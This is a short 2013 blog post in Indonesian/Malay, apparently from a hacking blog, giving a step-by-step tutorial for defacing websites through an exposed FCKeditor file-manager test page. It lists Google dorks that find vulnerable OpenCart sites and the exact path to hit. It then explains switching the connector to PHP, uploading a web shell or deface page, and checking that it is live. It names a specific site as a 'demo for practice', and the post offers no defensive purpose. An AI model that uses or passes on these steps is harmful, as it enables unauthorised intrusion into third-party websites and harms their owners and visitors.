Rabu, 17 April 2013

Deface Wordpress Dengan FCKeditor


Langkah 1: Buka google.com dan masukan Dork:


inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
atau
inurl:Powered By OpenCart



Pilihlah mana website yang diingini..

Contoh:



Langkah 2: Pasang exploit nya:

admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Contoh:


Akan kelihatan seperti dibawah:





Jika website tersebut ada patch, tambahkan exploitnya selepas patch

 Contoh:

www.site.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Langkah 3: Ganti “Connector” menjadi “PHP




Langkah 4: Upload Shell Atau Html Deface Agan2 :D


Langkah 5: Untuk check shell atau deface korang, check URL seperti ini:

atau





Demo untuk latihan:

http://wenrestaurant com/
http://wenrestaurant com/

Trims buat 207cyber

Tidak ada komentar:

Posting Komentar